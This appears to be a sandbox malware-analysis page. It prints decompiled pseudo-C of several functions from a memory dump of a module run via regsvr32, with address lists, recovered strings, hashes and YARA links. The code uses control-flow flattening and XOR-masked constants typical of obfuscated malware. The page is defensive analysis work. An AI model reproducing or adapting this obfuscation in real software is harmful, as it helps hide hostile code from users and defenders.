									_v68 = 0x360763;
									_v68 = _v68 >> 0xe;
									_v68 = _v68 * 9;
									_v68 = _v68 ^ 0x000b0339;
									E003C2050(_t433 + 0x10, _v76, __eflags,  &_v52, _v80, _v68);
									_t436 =  &(_t436[3]);
									_t330 = 0x3eff3;
									continue;
								} else {
									if(_t330 == 0x3eff3) {
										_v68 = 0x940957;
										_t393 = 0x6f;
										_v68 = _v68 / _t393;
										_v68 = _v68 + 0xcca9;
										_v68 = _v68 ^ 0x000426e2;
										_v80 = 0xa33d9e;
										_v80 = _v80 + 0xffff48b3;
										_v80 = _v80 | 0xe7ee093d;
										_v80 = _v80 ^ 0xe7ef69c9;
										_v76 = 0x34072a;
										_v76 = _v76 | 0x6eed95b6;
										_t394 = 0x3c;
										_v76 = _v76 / _t394;
										_v76 = _v76 ^ 0x01d1ee2f;
										_v72 = 0x9ce2db;
										_v72 = _v72 << 1;
										_v72 = _v72 >> 2;
										_v72 = _v72 ^ 0x004902ae;
										E003C2DB8( *((intOrPtr*)(_t433 + 0x2c)), _v68, _v80, _v76, _v72,  &_v52);
										_t330 = 0xefa91;
										while(1) {
											L1:
											_t436 =  &(_t436[4]);
											goto L2;
										}
									} else {
										if(_t330 == 0x514d0) {
											_v80 = 0xa926b;
											_v80 = _v80 ^ 0x0d8e7376;
											_v80 = _v80 + 0xfffff934;
											_t396 = 0x1b;
											_v80 = _v80 / _t396;
											_v80 = _v80 ^ 0x008d0430;
											_v76 = 0x450f1d;
											_v76 = _v76 + 0xffff8c1d;
											_v76 = _v76 ^ 0x004bf295;
											_v72 = 0x52ed0c;
											_v72 = _v72 + 0x25e7;
											_v72 = _v72 ^ 0x0057157f;
											_v68 = 0xd1707e;
											_v68 = _v68 * 0x46;
											_v68 = _v68 ^ 0x39493acd;
											E003CAE19( &_v52, _v80, _t434, _v76, _v72, _v68);
											_t330 = 0x33d23;
											while(1) {
												L1:
												_t436 =  &(_t436[4]);
												goto L2;
											}
										} else {
											if(_t330 == 0x5187a) {
												_t434[1] = E003D75E7(_t433);
												_t330 = 0xb8dc1;
												continue;
											} else {
												if(_t330 != 0x6253b) {
													goto L26;
												} else {
													_v76 = 0x93378b;
													_v76 = _v76 >> 0xe;
													_v76 = _v76 ^ 0x00078f44;
													_v68 = 0xbe9780;
													_v68 = _v68 + 0xffff131c;
													_v68 = _v68 ^ 0x00b553cd;
													_v80 = 0x766b91;
													_v80 = _v80 >> 6;
													_v80 = _v80 ^ 0x8fc4f264;
													_t399 = 0x77;
													_v80 = _v80 * 0x2c;
													_v80 = _v80 ^ 0xb5e96be2;
													_v72 = 0x44c6ca;
													_v72 = _v72 / _t399;
													_v72 = _v72 >> 8;
													_v72 = _v72 ^ 0x0008f0fc;
													E003C2DB8( *((intOrPtr*)(_t433 + 0x3c)), _v76, _v68, _v80, _v72,  &_v52);
													_t330 = 0xba3d9;
													while(1) {
														L1:
														_t436 =  &(_t436[4]);
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L29:
							__eflags =  *_t434;
							_t327 =  *_t434 != 0;
							__eflags = _t327;
							return 0 | _t327;
						}
						__eflags = _t330 - 0xb8dc1;
						if(__eflags == 0) {
							_v68 = 0xfe490d;
							_v68 = _v68 + 0xffff0ff1;
							_v68 = _v68 << 0xb;
							_v68 = _v68 ^ 0xeacb04da;
							_v76 = 0x76e82e;
							_t275 =  &_v76; // 0x76e82e
							_t382 = 0x41;
							_push(_t382);
							_v76 =  *_t275 / _t382;
							_v76 = _v76 ^ 0x000aa456;
							_v72 = 0xd268a4;
							_v72 = _v72 | 0x662e00ea;
							_v72 = _v72 << 9;
							_v72 = _v72 >> 0xe;
							_v72 = _v72 ^ 0x000e4059;
							_push(_t382);
							_t336 = E003C8D52(_t382, _t434[1], __eflags);
							 *_t434 = _t336;
							__eflags = _t336;
							if(__eflags == 0) {
								_t330 = 0xf913a;
								goto L26;
							} else {
								_t330 = 0x514d0;
								goto L2;
							}
						} else {
							__eflags = _t330 - 0xba3d9;
							if(_t330 == 0xba3d9) {
								_v68 = 0x2b8989;
								_v68 = _v68 ^ 0xd1aab2f1;
								_v68 = _v68 ^ 0x755e4c25;
								_v68 = _v68 ^ 0xa4dda0dd;
								_v76 = 0xd1d4e7;
								_t385 = 0x3c;
								_v76 = _v76 / _t385;
								_v76 = _v76 ^ 0x000f4ed9;
								_v72 = 0xf166ce;
								_v72 = _v72 * 0x4e;
								_v72 = _v72 ^ 0x82491e12;
								_v72 = _v72 + 0xffffb256;
								_t321 =  &_v72;
								 *_t321 = _v72 ^ 0xcbcdb0a9;
								__eflags =  *_t321;
								E003C2050(_t433 + 4, _v68,  *_t321,  &_v52, _v76, _v72);
							} else {
								__eflags = _t330 - 0xeb086;
								if(__eflags == 0) {
									 *_t434 =  *_t434 & 0x00000000;
									_t330 = 0x5187a;
									_t434[1] = _t434[1] & 0x00000000;
									goto L2;
								} else {
									__eflags = _t330 - 0xefa91;
									if(_t330 == 0xefa91) {
										_v76 = 0x7ef658;
										_v76 = _v76 << 2;
										_v76 = _v76 + 0xa804;
										_v76 = _v76 + 0xffff405b;
										_v76 = _v76 ^ 0x01f3297b;
										_v80 = 0x28eb83;
										_v80 = _v80 | 0xf96dd5fd;
										_v80 = _v80 ^ 0xf96577cd;
										_v68 = 0x9dc8d;
										_v68 = _v68 + 0xffff65f6;
										_v68 = _v68 ^ 0x000dad41;
										_v72 = 0x28688d;
										_v72 = _v72 | 0x597c0e1a;
										_v72 = _v72 * 0x14;
										_v72 = _v72 + 0xfffff989;
										_v72 = _v72 ^ 0xfdbafc5f;
										E003C2DB8( *_t433, _v76, _v80, _v68, _v72,  &_v52);
										_t330 = 0xff96d;
										goto L1;
									} else {
										__eflags = _t330 - 0xff96d;
										if(_t330 != 0xff96d) {
											goto L26;
										} else {
											_v72 = 0xd5cd57;
											_v72 = _v72 * 0x49;
											_v72 = _v72 + 0x2d57;
											_v72 = _v72 >> 1;
											_v72 = _v72 ^ 0x1e7df02f;
											_v80 = 0x89074f;
											_v80 = _v80 | 0x9a8a86b6;
											_v80 = _v80 >> 0x10;
											_v80 = _v80 * 0x34;
											_v80 = _v80 ^ 0x001ebd48;
											_v76 = 0x9177c;
											_v76 = _v76 ^ 0x179b4bcc;
											_v76 = _v76 + 0x985;
											_v76 = _v76 * 0xa;
											_v76 = _v76 ^ 0xebbdd05f;
											_v68 = 0x8b0311;
											_v68 = _v68 >> 0xe;
											_v68 = _v68 ^ 0x000cd34c;
											E003C2DB8( *((intOrPtr*)(_t433 + 0x20)), _v72, _v80, _v76, _v68,  &_v52);
											_t330 = 0xb7f71;
											while(1) {
												L1:
												_t436 =  &(_t436[4]);
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L29;
						L26:
						__eflags = _t330 - 0xf913a;
					} while (__eflags != 0);
					goto L29;
				}
			}

0x003d4930
0x003d4936
0x003d493a
0x003d493c
0x003d493d
0x003d4941
0x003d4942
0x003d4943
0x003d4948
0x003d4950
0x003d4955
0x003d4962
0x003d496a
0x003d496a
0x003d496a
0x003d496d
0x003d496d
0x003d496d
0x003d496d
0x003d496f
0x00000000
0x00000000
0x003d4975
0x003d4c46
0x003d4c56
0x003d4c5b
0x003d4c61
0x003d4c69
0x003d4c75
0x003d4c7a
0x003d4c80
0x003d4c88
0x003d4c90
0x003d4c98
0x003d4ca4
0x003d4ca7
0x003d4caf
0x003d4cb7
0x003d4cbf
0x003d4cc7
0x003d4ce3
0x003d4ce8
0x003d496a
0x003d496a
0x003d496a
0x00000000
0x003d496a
0x003d497b
0x003d4980
0x003d4bae
0x003d4bbe
0x003d4bc4
0x003d4bc8
0x003d4bd0
0x003d4bd5
0x003d4bdd
0x003d4be5
0x003d4bed
0x003d4bf5
0x003d4bfd
0x003d4c05
0x003d4c0d
0x003d4c17
0x003d4c1f
0x003d4c34
0x003d4c39
0x003d4c3c
0x00000000
0x003d4986
0x003d498b
0x003d4b00
0x003d4b10
0x003d4b15
0x003d4b1b
0x003d4b23
0x003d4b2b
0x003d4b33
0x003d4b3b
0x003d4b43
0x003d4b4b
0x003d4b53
0x003d4b5f
0x003d4b62
0x003d4b6a
0x003d4b72
0x003d4b7a
0x003d4b7e
0x003d4b83
0x003d4b9f
0x003d4ba4
0x003d496a
0x003d496a
0x003d496a
0x00000000
0x003d496a
0x003d4991
0x003d4996
0x003d4a64
0x003d4a6e
0x003d4a76
0x003d4a84
0x003d4a8b
0x003d4a8f
0x003d4a97
0x003d4a9f
0x003d4aa7
0x003d4aaf
0x003d4ab7
0x003d4abf
0x003d4ac7
0x003d4ad4
0x003d4ad8
0x003d4af1
0x003d4af6
0x003d496a
0x003d496a
0x003d496a
0x00000000
0x003d496a
0x003d499c
0x003d49a1
0x003d4a57
0x003d4a5a
0x00000000
0x003d49a7
0x003d49ac
0x00000000
0x003d49b2
0x003d49b2
0x003d49bc
0x003d49c1
0x003d49c9
0x003d49d1
0x003d49d9
0x003d49e1
0x003d49e9
0x003d49ee
0x003d49fd
0x003d49fe
0x003d4a02
0x003d4a0a
0x003d4a18
0x003d4a20
0x003d4a25
0x003d4a41
0x003d4a46
0x003d496a
0x003d496a
0x003d496a
0x00000000
0x003d496a
0x003d496a
0x003d49ac
0x003d49a1
0x003d4996
0x003d498b
0x003d4980
0x003d4faa
0x003d4fac
0x003d4fb0
0x003d4fb0
0x003d4fb7
0x003d4fb7
0x003d4cf2
0x003d4cf7
0x003d4e8b
0x003d4e95
0x003d4e9d
0x003d4ea2
0x003d4eaa
0x003d4eb2
0x003d4eb8
0x003d4ebb
0x003d4ebc
0x003d4ec0
0x003d4ec8
0x003d4ed0
0x003d4ed8
0x003d4edd
0x003d4ee2
0x003d4ef9
0x003d4efa
0x003d4eff
0x003d4f03
0x003d4f05
0x003d4f11
0x00000000
0x003d4f07
0x003d4f07
0x00000000
0x003d4f07
0x003d4cfd
0x003d4cfd
0x003d4d02
0x003d4f26
0x003d4f30
0x003d4f38
0x003d4f40
0x003d4f48
0x003d4f56
0x003d4f5c
0x003d4f60
0x003d4f68
0x003d4f75
0x003d4f7d
0x003d4f85
0x003d4f8d
0x003d4f8d
0x003d4f8d
0x003d4fa2
0x003d4d08
0x003d4d08
0x003d4d0d
0x003d4e7a
0x003d4e7d
0x003d4e82
0x00000000
0x003d4d13
0x003d4d13
0x003d4d18
0x003d4dd6
0x003d4dde
0x003d4de3
0x003d4deb
0x003d4df3
0x003d4dfb
0x003d4e03
0x003d4e0b
0x003d4e13
0x003d4e1b
0x003d4e23
0x003d4e2b
0x003d4e33
0x003d4e40
0x003d4e48
0x003d4e50
0x003d4e6b
0x003d4e70
0x00000000
0x003d4d1e
0x003d4d1e
0x003d4d23
0x00000000
0x003d4d29
0x003d4d29
0x003d4d36
0x003d4d3a
0x003d4d42
0x003d4d46
0x003d4d4e
0x003d4d56
0x003d4d5e
0x003d4d68
0x003d4d6c
0x003d4d74
0x003d4d7c
0x003d4d84
0x003d4d91
0x003d4d99
0x003d4da1
0x003d4da9
0x003d4dae
0x003d4dca
0x003d4dcf
0x003d496a
0x003d496a
0x003d496a
0x00000000
0x003d496a
0x003d496a
0x003d4d23
0x003d4d18
0x003d4d0d
0x003d4d02
0x00000000
0x003d4f16
0x003d4f16
0x003d4f16
0x00000000
0x003d4f21

Strings

%L^u, xrefs: 003D4F38
W-, xrefs: 003D4D3A
=, xrefs: 003D4B3B
.v, xrefs: 003D4EB2
&A, xrefs: 003D4962

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %L^u$&A$.v$=$W-
API String ID: 0-2224887547
Opcode ID: 7bddb950174e88f26096f2c2d94aacc1acb297c3ac9ca0cd407a952c3e78c53a
Instruction ID: 7ed0f49318e57ca5df67ab45eac07d93cc173082488d64384c561b1ce7b04f92
Opcode Fuzzy Hash: 7bddb950174e88f26096f2c2d94aacc1acb297c3ac9ca0cd407a952c3e78c53a
Instruction Fuzzy Hash: 69F1EF721083429BC319CF25E44985BBBE1FBD4758F108D1EF0A69A261D7B4DA49CF93

Uniqueness

Uniqueness Score: -1.00%

Function 003D2606 Relevance: 6.5, Strings: 5, Instructions: 265
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003D2606(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t253;
				void* _t255;
				intOrPtr _t264;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t280;
				intOrPtr _t282;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				intOrPtr _t318;
				intOrPtr* _t320;
				void* _t322;
				void* _t323;

				_t288 = _a8;
				_t320 = _a4;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t320);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t253);
				_t323 = _t322 + 0x18;
				_v20 = 0x38060;
				_v16 = 0xc5503;
				_t318 = 0;
				_t255 = 0xce7d8;
				do {
					while(_t255 != 0x35980) {
						if(_t255 == 0x627d4) {
							_v24 = 0xc5a66c;
							_t294 = 0x77;
							_v24 = _v24 / _t294;
							_v24 = _v24 ^ 0x0001a933;
							_v32 = 0xa4cd05;
							_v32 = _v32 >> 0xc;
							_v32 = _v32 + 0x42cb;
							_v32 = _v32 ^ 0x0000c57f;
							_v36 = 0xc760f4;
							_v36 = _v36 >> 0xc;
							_v36 = _v36 >> 7;
							_v36 = _v36 ^ 0x0006a26e;
							_v48 = 0x6924d;
							_v48 = _v48 | 0xbff7ff37;
							_v48 = _v48 + 0xc9b2;
							_v48 = _v48 ^ 0xbffd57f0;
							_v52 = 0x12725c;
							_v52 = _v52 ^ 0x891a1dbf;
							_v52 = _v52 + 0xcad4;
							_t295 = 0x36;
							_v52 = _v52 / _t295;
							_v52 = _v52 ^ 0x02848e59;
							_v40 = 0x44350c;
							_v40 = _v40 ^ 0x6a28c909;
							_v40 = _v40 * 0x22;
							_v40 = _v40 ^ 0x227d8494;
							_v28 = 0xbbfd3f;
							_v28 = _v28 + 0xffff074a;
							_v28 = _v28 ^ 0x00bfaef5;
							_v56 = 0x9ec237;
							_v56 = _v56 >> 0xf;
							_v56 = _v56 + 0xffffd67a;
							_v56 = _v56 >> 0xa;
							_v56 = _v56 ^ 0x00386857;
							_v44 = 0x7487bc;
							_v44 = _v44 + 0x4325;
							_v44 = _v44 ^ 0x9d338f4c;
							_v44 = _v44 ^ 0x9d4a8fed;
							_v20 = 0x976952;
							_v20 = _v20 >> 0xc;
							_v20 = _v20 ^ 0x00095104;
							_t271 =  *0x3e221c; // 0x0
							_t273 = E003C1F80( *((intOrPtr*)(_t288 + 4)), _v32, _v36, _t295,  &_v8, _v48, _t295, _v52, _v40,  *_t288, _v28, _t295,  *((intOrPtr*)(_t271 + 0x64)), _t318, _t318, _v56, _v24, _v44, _v20);
							_t323 = _t323 + 0x44;
							__eflags = _t273;
							if(__eflags == 0) {
								_t255 = 0x35980;
								continue;
							}
						} else {
							if(_t255 == 0x89b9b) {
								_v40 = 0x5f1a34;
								_v40 = _v40 << 0xb;
								_v40 = _v40 ^ 0xf8d1a001;
								_v20 = 0xcc591e;
								_t297 = 0x38;
								_v20 = _v20 / _t297;
								_v20 = _v20 ^ 0x0000dfab;
								_v24 = 0x6f8290;
								_v24 = _v24 ^ 0x464b5619;
								_v24 = _v24 ^ 0x46258a85;
								_v28 = 0x6d26eb;
								_v28 = _v28 << 8;
								_v28 = _v28 ^ 0x6d2bf3ef;
								_v52 = 0xb75c3b;
								_v52 = _v52 + 0xffff0db9;
								_v52 = _v52 + 0x6841;
								_v52 = _v52 ^ 0x00b5b9a3;
								_v44 = 0x3189b9;
								_v44 = _v44 >> 8;
								_v44 = _v44 ^ 0x0001a5e6;
								_v48 = 0x7e1df5;
								_v48 = _v48 | 0x0469c7b6;
								_t298 = 0x3d;
								_v48 = _v48 * 0x1f;
								_v48 = _v48 ^ 0x8b726552;
								_v56 = 0x1a6b52;
								_v56 = _v56 * 0x1d;
								_v56 = _v56 + 0x990d;
								_v56 = _v56 / _t298;
								_v56 = _v56 ^ 0x0003ef7a;
								_v36 = 0x2d89d9;
								_v36 = _v36 + 0xffff5575;
								_v36 = _v36 ^ 0x002ccc81;
								_v32 = 0x5b5c52;
								_v32 = _v32 + 0x5fd8;
								_v32 = _v32 ^ 0x0050523f;
								_t280 =  *0x3e221c; // 0x0
								_t282 = E003C1F80( *((intOrPtr*)(_t288 + 4)), _v20, _v24, _t298,  &_v8, _v28, _t298, _v52, _v44,  *_t288, _v48, _t298,  *((intOrPtr*)(_t280 + 0x64)), _v12, _v8, _v56, _v40, _v36, _v32);
								_t323 = _t323 + 0x44;
								__eflags = _t282;
								if(__eflags == 0) {
									 *_t320 = _v12;
									_t318 = 1;
									__eflags = 1;
									 *((intOrPtr*)(_t320 + 4)) = _v8;
								} else {
									_t255 = 0x8b03a;
									continue;
								}
							} else {
								if(_t255 == 0x8b03a) {
									_v20 = 0x4db898;
									_v20 = _v20 + 0xda83;
									_v20 = _v20 ^ 0x0044b91d;
									_v56 = 0x3140c9;
									_v56 = _v56 + 0x9cbe;
									_v56 = _v56 * 0x2c;
									_v56 = _v56 >> 4;
									_v56 = _v56 ^ 0x0082283c;
									_v52 = 0x881e6f;
									_v52 = _v52 << 0xb;
									_v52 = _v52 + 0x211f;
									_v52 = _v52 >> 9;
									_v52 = _v52 ^ 0x002dea1d;
									_v48 = 0x38ee57;
									_v48 = _v48 + 0x7d83;
									_v48 = _v48 + 0xffff6fea;
									_v48 = _v48 * 0x67;
									_v48 = _v48 ^ 0x16e3ecb4;
									E003C79D0(_v20, _v56, __eflags, _v52, _v12, _v48);
								} else {
									if(_t255 != 0xce7d8) {
										goto L14;
									} else {
										_t255 = 0x627d4;
										continue;
									}
								}
							}
						}
						L18:
						return _t318;
					}
					_v48 = 0x12776;
					_v48 = _v48 >> 0xd;
					_t290 = 0xa;
					_v48 = _v48 / _t290;
					_v48 = _v48 | 0xbab06758;
					_v48 = _v48 ^ 0xbab677f2;
					_v36 = 0x6010f0;
					_v36 = _v36 + 0x68f4;
					_t291 = 0x4b;
					_push(_t291);
					_push(_t291);
					_v36 = _v36 * 0x4b;
					_v36 = _v36 ^ 0x1c4ddf39;
					_v32 = 0x1f404a;
					_v32 = _v32 >> 8;
					_v32 = _v32 / _t291;
					_v32 = _v32 ^ 0x0004d9b9;
					_t264 = E003C8D52(_t291, _v8, __eflags);
					_v12 = _t264;
					__eflags = _t264;
					if(__eflags == 0) {
						_t255 = 0xe3acf;
						goto L14;
					} else {
						_t255 = 0x89b9b;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t255 - 0xe3acf;
				} while (__eflags != 0);
				goto L18;
			}

0x003d260a
0x003d2610
0x003d2615
0x003d2619
0x003d261d
0x003d261e
0x003d261f
0x003d2620
0x003d2621
0x003d2626
0x003d2629
0x003d2631
0x003d2639
0x003d263b
0x003d2645
0x003d2645
0x003d2652
0x003d27f2
0x003d2802
0x003d2807
0x003d280d
0x003d2815
0x003d281d
0x003d2822
0x003d282a
0x003d2832
0x003d283a
0x003d283f
0x003d2844
0x003d284c
0x003d2854
0x003d285c
0x003d2864
0x003d286c
0x003d2874
0x003d287c
0x003d2888
0x003d288b
0x003d288f
0x003d2897
0x003d289f
0x003d28ac
0x003d28b0
0x003d28b8
0x003d28c0
0x003d28c8
0x003d28d0
0x003d28d8
0x003d28dd
0x003d28e5
0x003d28ea
0x003d28f2
0x003d28fa
0x003d2902
0x003d290a
0x003d2912
0x003d291a
0x003d291f
0x003d2937
0x003d2966
0x003d296b
0x003d296e
0x003d2970
0x003d2976
0x00000000
0x003d2976
0x003d2658
0x003d265d
0x003d267c
0x003d2686
0x003d268b
0x003d2693
0x003d26a1
0x003d26a6
0x003d26ac
0x003d26b4
0x003d26bc
0x003d26c4
0x003d26cc
0x003d26d4
0x003d26d9
0x003d26e1
0x003d26e9
0x003d26f1
0x003d26f9
0x003d2701
0x003d2709
0x003d270e
0x003d2716
0x003d271e
0x003d272b
0x003d272c
0x003d2730
0x003d2738
0x003d2745
0x003d2749
0x003d2757
0x003d275b
0x003d2763
0x003d276b
0x003d2773
0x003d277b
0x003d2783
0x003d278b
0x003d27a3
0x003d27d8
0x003d27dd
0x003d27e0
0x003d27e2
0x003d2adb
0x003d2add
0x003d2add
0x003d2ae2
0x003d27e8
0x003d27e8
0x00000000
0x003d27e8
0x003d265f
0x003d2664
0x003d2a2e
0x003d2a36
0x003d2a3e
0x003d2a46
0x003d2a4e
0x003d2a5b
0x003d2a5f
0x003d2a64
0x003d2a6c
0x003d2a74
0x003d2a79
0x003d2a81
0x003d2a86
0x003d2a8e
0x003d2a96
0x003d2a9e
0x003d2aab
0x003d2aaf
0x003d2acb
0x003d266a
0x003d266f
0x00000000
0x003d2675
0x003d2675
0x00000000
0x003d2675
0x003d266f
0x003d2664
0x003d265d
0x003d2ae5
0x003d2aee
0x003d2aee
0x003d297d
0x003d2987
0x003d2992
0x003d2997
0x003d299d
0x003d29a5
0x003d29ad
0x003d29b5
0x003d29c2
0x003d29c3
0x003d29c4
0x003d29c5
0x003d29c9
0x003d29d1
0x003d29d9
0x003d29e4
0x003d29e8
0x003d2a00
0x003d2a05
0x003d2a0b
0x003d2a0d
0x003d2a19
0x00000000
0x003d2a0f
0x003d2a0f
0x00000000
0x003d2a0f
0x00000000
0x003d2a1e
0x003d2a1e
0x003d2a1e
0x00000000

Strings

W8, xrefs: 003D2A8E
%C, xrefs: 003D28FA
&m, xrefs: 003D26CC
Wh8, xrefs: 003D28EA
?RP, xrefs: 003D278B

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %C$?RP$Wh8$W8$&m
API String ID: 0-2852606013
Opcode ID: 2c18bb0065dbc6e823b56fac2ccb5185ecd6ea997dd95df66693aef881683dbd
Instruction ID: c2eb6ea4a80e53b698a8b7a7beb36e1aaa90cb651593b1ede860e910557d523e
Opcode Fuzzy Hash: 2c18bb0065dbc6e823b56fac2ccb5185ecd6ea997dd95df66693aef881683dbd
Instruction Fuzzy Hash: C8D11FB2108341AFC345CF25D98980BBBE1FBD8708F409A1EF5959A260D7B5DA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 003C9400 Relevance: 6.5, Strings: 5, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E003C9400(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t187;
				signed int _t197;
				void* _t209;
				signed int _t211;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				void* _t246;
				void* _t247;
				signed int* _t250;
				signed int* _t252;

				_t250 =  &_v28;
				_v12 = 0xdcfb7;
				_t209 = __ecx;
				_v8 = 0x53274;
				_t246 = __edx;
				_v4 = 0xa1052;
				_t247 = 0xf2e87;
				while(1) {
					L1:
					_t187 = 0x6492d;
					while(1) {
						L2:
						_t211 = 0x4f;
						do {
							L3:
							while(_t247 != 0x63bb8) {
								if(_t247 == _t187) {
									_v20 = 0x416829;
									_v20 = _v20 | 0x89f8680d;
									_v20 = _v20 * 0x47;
									_v20 = _v20 ^ 0x442dd5bd;
									_v16 = 0xf8eac0;
									_v16 = _v16 + 0xffff418d;
									_v16 = _v16 ^ 0x00fcde67;
									_v28 = 0x861462;
									_v28 = _v28 ^ 0x8128dabe;
									_v28 = _v28 + 0x710f;
									_v28 = _v28 ^ 0x81a2e706;
									_v24 = 0x24d29a;
									_v24 = _v24 | 0xcefdd927;
									_v24 = _v24 * 0x13;
									_v24 = _v24 ^ 0x5cd78655;
									_push(_v24);
									_push(_v28);
									_push(_v16);
									_push(_v20);
									_push(_t246);
									_t187 = E003CE7C3(_t211, E003C9884);
									_t250 = _t250 - 0xc + 0x20;
									 *(_t246 + 0x30) = _t187;
									__eflags = _t187;
									if(__eflags == 0) {
										_t247 = 0x63bb8;
										goto L1;
									}
								} else {
									if(_t247 == 0xa24b6) {
										_v24 = 0x3c7666;
										_t92 =  &_v24; // 0x3c7666
										_t215 = 0x7f;
										_v24 =  *_t92 / _t215;
										_v24 = _v24 | 0x842ad72d;
										_v24 = _v24 ^ 0xf360ec49;
										_v24 = _v24 ^ 0x774de17a;
										_v16 = 0xbccf80;
										_v16 = _v16 | 0xff46e3e6;
										_v16 = _v16 ^ 0xfffaa4e4;
										_v28 = 0x119b15;
										_t216 = 0x13;
										_v28 = _v28 / _t216;
										_t217 = 7;
										_v28 = _v28 / _t217;
										_v28 = _v28 ^ 0x0007003b;
										_t197 = E003CDACA( *(_t246 + 0x44), _v24, _v16, _v28);
										_t250 =  &(_t250[2]);
										 *(_t246 + 8) = _t197;
										__eflags = _t197;
										_t187 = 0x6492d;
										_t247 =  !=  ? 0x6492d : 0x63bb8;
										goto L2;
									} else {
										if(_t247 == 0xaf3ff) {
											_v20 = 0xf258b6;
											_v20 = _v20 ^ 0xa4ba8671;
											_v20 = _v20 ^ 0xa44a1b8a;
											_v24 = 0xd1ff43;
											_push(_t211);
											_v24 = _v24 / _t211;
											_v24 = _v24 >> 0x10;
											_v24 = _v24 | 0x7b7ef738;
											_v24 = _v24 ^ 0x7b7af6a0;
											_v28 = 0x15a4c5;
											_v28 = _v28 + 0x8973;
											_v28 = _v28 * 0x6d;
											_v28 = _v28 | 0x7716b34f;
											_v28 = _v28 ^ 0x7f70a7ef;
											_push(_v28);
											_push(_v24);
											_t187 = E003DDC64(_t209, _v20, __eflags);
											_t252 =  &(_t250[3]);
											 *(_t246 + 0x44) = _t187;
											__eflags = _t187;
											if(_t187 != 0) {
												_v24 = 0x4cb3c;
												_v24 = _v24 + 0xffffdd33;
												_v24 = _v24 + 0xffffa72e;
												_v24 = _v24 ^ 0x00061867;
												_v20 = 0xe5cb07;
												_v20 = _v20 | 0x54650c80;
												_v20 = _v20 ^ 0x54e54041;
												E003C780A( *(_t246 + 0x44),  *(_t246 + 0x44), _v24, _v20);
												_v16 = 0x2e412b;
												_t51 =  &_v16; // 0x2e412b
												_t221 = 0x4a;
												_v16 =  *_t51 / _t221;
												_v16 = _v16 ^ 0x0005355f;
												_v24 = 0x67dd7b;
												_t222 = 0x4f;
												_v24 = _v24 / _t222;
												_v24 = _v24 + 0xc37;
												_t223 = 0x65;
												_v24 = _v24 / _t223;
												_v24 = _v24 ^ 0x00011784;
												_v28 = 0xa7ffb9;
												_v28 = _v28 | 0xfdf2fabd;
												_v28 = _v28 ^ 0xfdfe461c;
												_v20 = 0x26e31b;
												_v20 = _v20 << 3;
												_v20 = _v20 ^ 0x013d02b6;
												E003E06E7(_v16, _v24, _v28,  *(_t246 + 0x44), _v20);
												_t250 =  &(_t252[5]);
												_t247 = 0xa24b6;
												while(1) {
													L1:
													_t187 = 0x6492d;
													L2:
													_t211 = 0x4f;
													goto L3;
												}
											}
										} else {
											if(_t247 != 0xf2e87) {
												goto L15;
											} else {
												_t247 = 0xaf3ff;
												continue;
											}
										}
									}
								}
								goto L16;
							}
							_v28 = 0x664bb8;
							_v28 = _v28 | 0xaf11ec18;
							_v28 = _v28 + 0xba3c;
							_v28 = _v28 ^ 0xaf72a094;
							_v20 = 0xf7db02;
							_v20 = _v20 + 0xfd28;
							_v20 = _v20 + 0xedae;
							_v20 = _v20 ^ 0x00f9dfc2;
							_v24 = 0x20ca69;
							_v24 = _v24 << 7;
							_v24 = _v24 + 0xbd9e;
							_v24 = _v24 + 0x7069;
							_t181 =  &_v24;
							 *_t181 = _v24 ^ 0x1069140b;
							__eflags =  *_t181;
							E003C5CF1(_v28, _v20,  *(_t246 + 0x44), _v24);
							_t247 = 0xb044e;
							_t187 = 0x6492d;
							_t211 = 0x4f;
							L15:
							__eflags = _t247 - 0xb044e;
						} while (__eflags != 0);
						L16:
						return _t187;
					}
				}
			}

0x003c9400
0x003c9406
0x003c940e
0x003c9411
0x003c9419
0x003c941b
0x003c9423
0x003c942d
0x003c942d
0x003c942d
0x003c9432
0x003c9432
0x003c9434
0x003c9435
0x00000000
0x003c9435
0x003c943f
0x003c9689
0x003c9696
0x003c96a3
0x003c96a7
0x003c96af
0x003c96b7
0x003c96bf
0x003c96c7
0x003c96cf
0x003c96d7
0x003c96df
0x003c96e7
0x003c96ef
0x003c96fc
0x003c9700
0x003c9708
0x003c970c
0x003c9713
0x003c9717
0x003c971b
0x003c971c
0x003c9721
0x003c9724
0x003c9727
0x003c9729
0x003c972f
0x00000000
0x003c972f
0x003c9445
0x003c944b
0x003c95e9
0x003c95f3
0x003c95f9
0x003c95fe
0x003c9604
0x003c960c
